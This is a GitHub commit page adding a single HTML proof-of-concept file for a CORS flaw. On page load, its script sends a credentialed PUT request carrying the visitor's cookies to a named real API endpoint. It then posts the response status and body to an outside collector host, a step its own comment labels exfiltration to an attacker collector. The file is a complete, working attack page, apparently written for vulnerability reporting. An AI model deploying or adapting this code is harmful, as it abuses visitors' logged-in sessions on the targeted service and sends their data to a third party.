File tree Expand file tree Collapse file tree 1 file changed +50
-0
lines changed
Expand file tree Collapse file tree 1 file changed +50
-0
lines changed Original file line number Diff line number Diff line change 1+ <!doctype html>
2+ < html >
3+ < head > < meta charset ="utf-8 "> < title > CORS PUT PoC</ title > </ head >
4+ < body >
5+ < h3 > CORS PUT PoC</ h3 >
6+ < script >
7+ async function runPoC ( ) {
8+ try {
9+ const resp = await fetch ( 'https://studio-api.jup.ag/update-token-content' , {
10+ method : 'PUT' ,
11+ credentials : 'include' , // include cookies/session
12+ headers : {
13+ 'Content-Type' : 'application/json'
14+ } ,
15+ body : JSON . stringify ( {
16+ op : 'poc' ,
17+ data : 'cors-test'
18+ } )
19+ } ) ;
20+
21+ const status = resp . status ;
22+ let text ;
23+ try {
24+ text = await resp . text ( ) ;
25+ } catch ( e ) {
26+ text = '[unable to read body] ' + e ;
27+ }
28+
29+ // Exfiltrate response to attacker collector
30+ await fetch ( 'https://avicoder.me/collect' , {
31+ method : 'POST' ,
32+ mode : 'cors' ,
33+ headers : { 'Content-Type' : 'application/json' } ,
34+ body : JSON . stringify ( {
35+ target : 'https://studio-api.jup.ag/update-token-content' ,
36+ status,
37+ body : text
38+ } )
39+ } ) ;
40+
41+ console . log ( 'PoC finished' , status , text ) ;
42+ } catch ( err ) {
43+ console . error ( 'PoC error' , err ) ;
44+ }
45+ }
46+
47+ runPoC ( ) ;
48+ </ script >
49+ </ body >
50+ </ html >
You can’t perform that action at this time.
0 commit comments